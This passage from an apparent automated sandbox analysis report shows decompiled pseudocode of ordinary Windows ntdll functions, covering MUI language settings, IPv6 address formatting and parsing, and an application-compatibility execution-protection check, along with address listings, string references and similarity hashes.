							_v12 = _v12 + 2;
							 *_v12 = 0;
							E009BE2A8(_v12,  &_v68, _v16);
							if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E009CE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E009BE2A8(_t322,  &_v68, _t269);
							if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E009D718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E009BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E009B2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E009CE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E009BE2A8(_v12,  &_v68, _v16);
						if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E009CE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E009BE2A8(_t322,  &_v68, _t296);
						if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x009d8788
0x009d8788
0x009d8791
0x009d8794
0x009d8798
0x009d879b
0x009d879e
0x009d87a1
0x009d87a4
0x009d87a7
0x009d87aa
0x009d87af
0x00a21ad3
0x009d8b0a
0x009d8b0d
0x009d8b13
0x009d8b19
0x009d8b1f
0x009d8b25
0x009d8b2b
0x009d8b31
0x009d8b37
0x009d8b3d
0x009d8b46
0x009d8b46
0x009d87c6
0x009d87d0
0x00a21ae0
0x00a21ae6
0x00a21af8
0x00a21af8
0x00a21afd
0x00a21afe
0x00a21b01
0x00a21b06
0x00a21b06
0x009d87d6
0x009d87f2
0x009d87f7
0x009d8807
0x009d880a
0x009d880f
0x009d8810
0x009d8813
0x009d8818
0x009d8818
0x009d882c
0x009d8831
0x009d8838
0x009d8908
0x009d8920
0x009d89f0
0x009d8a08
0x009d8af6
0x009d8af6
0x009d8af8
0x009d8afb
0x00a21beb
0x00a21beb
0x009d8b04
0x00a21bf8
0x00a21c0e
0x00a21c13
0x00a21c16
0x00a21c16
0x00a21bf8
0x00000000
0x009d8b04
0x009d8a0e
0x009d8a11
0x009d8a14
0x009d8a15
0x009d8a18
0x009d8a22
0x009d8b59
0x009d8a28
0x009d8a3c
0x009d8a3c
0x009d8a42
0x00a21bb0
0x00a21b11
0x00a21b11
0x00000000
0x009d8a48
0x009d8a51
0x009d8a5b
0x009d8a5e
0x009d8a61
0x009d8a69
0x009d8a69
0x009d8a6d
0x00000000
0x00000000
0x009d8a74
0x009d8a7c
0x009d8a7d
0x009d8a91
0x009d8a93
0x009d8a93
0x009d8a98
0x009d8a9b
0x009d8aa1
0x009d8aa1
0x009d8aa4
0x009d8aaa
0x009d8ab1
0x009d8ac5
0x009d8ac7
0x009d8ac7
0x009d8ac5
0x009d8ace
0x00a21bc9
0x00a21bce
0x00a21bd2
0x00a21bd2
0x009d8ad8
0x009d8aeb
0x009d8aeb
0x009d8af0
0x009d8af4
0x00000000
0x009d8af4
0x009d8a42
0x009d8926
0x009d8929
0x009d892c
0x009d892d
0x009d8930
0x009d8935
0x009d893a
0x009d8b51
0x009d8940
0x009d8954
0x009d8954
0x009d895a
0x00a21b63
0x00000000
0x009d8960
0x009d8969
0x009d8973
0x009d8976
0x009d8979
0x009d897e
0x009d8981
0x009d8981
0x009d8986
0x00000000
0x00000000
0x00a21b6e
0x00a21b74
0x00a21b7b
0x00a21b8f
0x00a21b91
0x00a21b91
0x00a21b99
0x00a21b9c
0x00a21ba2
0x00a21ba2
0x009d898c
0x009d8992
0x009d8999
0x009d89ad
0x00a21ba8
0x00a21ba8
0x009d89ad
0x009d89b6
0x009d89c8
0x009d89cd
0x009d89d0
0x009d89d0
0x009d89d6
0x009d89e8
0x009d89e8
0x009d89ed
0x00000000
0x009d89ed
0x009d895a
0x009d883e
0x009d8841
0x009d8844
0x009d8845
0x009d8848
0x009d884d
0x009d8852
0x009d8b49
0x009d8858
0x009d886c
0x009d886c
0x009d8872
0x00a21b0e
0x00000000
0x009d8878
0x009d8881
0x009d888b
0x009d888e
0x009d8891
0x009d8896
0x009d8899
0x009d8899
0x009d889e
0x00000000
0x00000000
0x00a21b21
0x00a21b27
0x00a21b2e
0x00a21b42
0x00a21b44
0x00a21b44
0x00a21b4c
0x00a21b4f
0x00a21b55
0x00a21b55
0x009d88a4
0x009d88aa
0x009d88b1
0x009d88c5
0x00a21b5b
0x00a21b5b
0x009d88c5
0x009d88ce
0x009d88e0
0x009d88e5
0x009d88e8
0x009d88e8
0x009d88ee
0x009d8900
0x009d8900
0x009d8905
0x00000000
0x009d8905

APIs

_wcspbrk.LIBCMT ref: 009D8891
_wcspbrk.LIBCMT ref: 009D8979
_wcspbrk.LIBCMT ref: 009D8A61
_wcspbrk.LIBCMT ref: 009D8A9B
_wcspbrk.LIBCMT ref: 00A21B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 009D8914
Kernel-MUI-Language-SKU, xrefs: 009D89FC
Kernel-MUI-Number-Allowed, xrefs: 009D87E6
WindowsExcludedProcs, xrefs: 009D87C1
Kernel-MUI-Language-Allowed, xrefs: 009D8827

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c617d64167836f66e7a952a519cc0c581d2b1e3a9657cf415f6c0cd5eaf48fa2
Instruction ID: ccf759fb3fab3d8deeadae8e4cf0ffc87af4c02193143b37661f0ab6ba7bf519
Opcode Fuzzy Hash: c617d64167836f66e7a952a519cc0c581d2b1e3a9657cf415f6c0cd5eaf48fa2
Instruction Fuzzy Hash: 74F1F7B1D40209EFCF11EF95CA81EEEB7B8FF58310F14846AE505A7211EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009F13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009F13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E009E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x9b2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E009E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x9b9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E009E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E009E7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E009E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E009E7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009f13d5
0x009f13d9
0x009f13dc
0x009f13de
0x009f13e1
0x009f13e8
0x009f13ee
0x00a1e8fd
0x00000000
0x00a1e921
0x00a1e921
0x00a1e928
0x00a1e982
0x00a1e98a
0x00000000
0x00a1e99a
0x00a1e99e
0x00a1e9a3
0x00a1e9a8
0x00a1e9b9
0x00a1e978
0x00000000
0x00a1e978
0x00a1e98a
0x00a1e92a
0x00a1e931
0x00a1e944
0x00a1e944
0x00a1e950
0x00a1e954
0x00a1e959
0x00a1e95e
0x00a1e963
0x00a1e970
0x00000000
0x00a1e975
0x00a1e93b
0x00a1e980
0x00000000
0x00a1e980
0x00a1e942
0x00a1e94b
0x00000000
0x00a1e94b
0x00000000
0x00a1e942
0x009f13f4
0x009f13f4
0x009f13f9
0x009f13fc
0x009f13ff
0x009f1406
0x00a1e9cc
0x00a1e9d2
0x00a1e9d2
0x00a1e9cc
0x009f140c
0x009f1411
0x009f1431
0x009f143a
0x009f143c
0x009f143f
0x009f143f
0x009f1442
0x009f1447
0x009f14a8
0x009f14ac
0x00a1e9e2
0x00a1e9e7
0x00a1e9ec
0x00a1ea05
0x00a1ea05
0x00000000
0x009f1449
0x00000000
0x009f1449
0x009f144c
0x009f1459
0x009f1462
0x009f1469
0x009f146a
0x009f1470
0x009f1473
0x009f1476
0x009f1476
0x009f1490
0x009f1495
0x009f138e
0x009f1390
0x009f1397
0x009f1398
0x009f1399
0x009f13a1
0x009f13a4
0x009f13a4
0x009f1498
0x009f149c
0x009f149f
0x009f14a2
0x00000000
0x00000000
0x009f14a4
0x00000000
0x009f14a4
0x009f1413
0x009f1415
0x009f1416
0x009f1419
0x009f141c
0x009f1422
0x009f13b7
0x009f13bc
0x009f13bf
0x009f13bf
0x009f13c2
0x009f1424
0x009f1424
0x009f1424
0x009f1427
0x009f142b
0x009f142c
0x009f142c
0x009f142c
0x00000000
0x009f141c
0x009f1411

APIs

___swprintf_l.LIBCMT ref: 009F146B
___swprintf_l.LIBCMT ref: 009F1490
___swprintf_l.LIBCMT ref: 00A1E970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 00A1E9B0
ffff:, xrefs: 00A1E94B
:%u.%u.%u.%u, xrefs: 00A1E9F4
::%hs%u.%u.%u.%u, xrefs: 00A1E967

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
Instruction ID: d93b18219272e5173e50cebf286d090a232cd2b4fc2ec69c5ac9adf780fee3b9
Opcode Fuzzy Hash: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
Instruction Fuzzy Hash: 5F613871900659EACF34CF9AC8908BEBBB9EFD4310714C42DFAD647540D374AA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009E7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xa92088; // 0x75962c32
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E009E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A03F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E009BDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xa94218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A03F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E009C0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A03F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E009C8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A03F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00A2E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A03F92();
					_t38 = 1;
					L2:
					return E009BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x009e7f08
0x009e7f0f
0x009e7f12
0x009e7f1b
0x009e7f31
0x00a03ead
0x00a03eb4
0x00000000
0x00000000
0x00a03eba
0x00a03ecd
0x00a03ed2
0x00a03ee1
0x00a03ee7
0x00a03eec
0x00a03f12
0x00a03f18
0x00a03f1a
0x00000000
0x00000000
0x00a03f20
0x00a03f26
0x00a03f28
0x00000000
0x00000000
0x00a03f2e
0x00a03f30
0x00000000
0x00000000
0x00a03f3a
0x00a03f3b
0x00a03f53
0x00a03f64
0x00a03f69
0x00a03f6c
0x00a03f6d
0x00a03f6f
0x00a0e304
0x00a0e30f
0x00a0e315
0x00a0e31e
0x00a0e321
0x00a0e327
0x00a0e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00a0e32f
0x00a0e32f
0x00a0e337
0x00a0e33a
0x00a0e33b
0x00a0e33d
0x00a0e33f
0x00a0e341
0x00a0e341
0x00a0e34e
0x00a0e353
0x00a0e358
0x00a0e35d
0x00a0e35f
0x00000000
0x00000000
0x00a0e365
0x00a0e365
0x00a0e368
0x00a0e36e
0x00000000
0x00000000
0x00a0e374
0x00a0e32f
0x00a03f75
0x00a03f7a
0x00a03f7c
0x00a03f7e
0x00a03f86
0x009e7f39
0x009e7f47
0x009e7f47
0x009e7f37
0x009e7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A03F12

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A03F4A
ExecuteOptions, xrefs: 00A03F04
Execute=1, xrefs: 00A03F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A0E2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A03EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A03F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 00A0E345

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
Instruction ID: 52655d215fa7f5c7d3201bf60dff6823e5e030b42eb2eab9ed7f2c10d6d0af18
Opcode Fuzzy Hash: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
Instruction Fuzzy Hash: 1141C672A4021D7ADF21DB95DDC6FEAB3BCAB54704F0009A9B105A60C2EA70AE458F61

Uniqueness

Uniqueness Score: -1.00%

Function 009F0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E009C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E009BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E009F0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E009F0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009F06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009F06BA(_t135, _t178) == 0 || E009F0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E009F0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E009F0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009F06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009F06BA(_t124, _t142) == 0 || E009F0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x009f0b21
0x009f0b24
0x009f0b27
0x009f0b2a
0x009f0b2d
0x009f0b30
0x009f0b33
0x009f0b36
0x009f0b39
0x009f0b3e
0x009f0c65
0x009f0c68
0x009f0c6a
0x009f0c6f
0x00a1eb42
0x00000000
0x00000000
0x00a1eb48
0x00a1eb48
0x009f0c75
0x009f0c7a
0x00a1eb54
0x00000000
0x00000000
0x00000000
0x00a1eb5a
0x009f0c80
0x009f0c84
0x00a1eb98
0x00000000
0x00000000
0x00a1eba6
0x009f0cb8
0x009f0cba
0x009f0cd3
0x009f0cda
0x009f0ce4
0x009f0ce9
0x00000000
0x009f0cec
0x009f0c8c
0x00a1eb63
0x00000000
0x00000000
0x00a1eb70
0x00a1eb75
0x00a1eb7d
0x00000000
0x00000000
0x00a1eb8c
0x00000000
0x00a1eb8c
0x009f0c96
0x00000000
0x00000000
0x009f0ca2
0x009f0cac
0x009f0cb4
0x00000000
0x00000000
0x009f0b44
0x009f0b47
0x009f0b49
0x00000000
0x00000000
0x009f0b4f
0x009f0b50
0x00000000
0x00000000
0x009f0b56
0x009f0b62
0x009f0b7c
0x009f0bac
0x009f0a0f
0x00a1eaaa
0x00000000
0x00a1eac4
0x00a1eac4
0x009f0bd0
0x009f0bd0
0x009f0bd4
0x009f0bd9
0x00000000
0x00000000
0x009f0bdb
0x009f0be0
0x00a1eb0e
0x009f0a1a
0x00000000
0x009f0a1a
0x00a1eb1a
0x00a1eb1f
0x00a1eb27
0x00000000
0x00000000
0x00a1eb36
0x00000000
0x00a1eb36
0x009f0bea
0x00000000
0x00000000
0x009f0bf6
0x009f0c00
0x009f0c03
0x009f0c0b
0x00000000
0x009f0c0b
0x00a1eaaa
0x00000000
0x009f0a15
0x009f0bb6
0x00000000
0x009f0bc6
0x009f0bc6
0x009f0bcb
0x009f0c15
0x00000000
0x00000000
0x009f0c1d
0x009f0c20
0x009f0c21
0x009f0c24
0x009f0c24
0x009f0c26
0x00000000
0x009f0c26
0x009f0bcd
0x00000000
0x009f0bcd
0x009f0b89
0x009f0b89
0x009f0b90
0x00000000
0x00000000
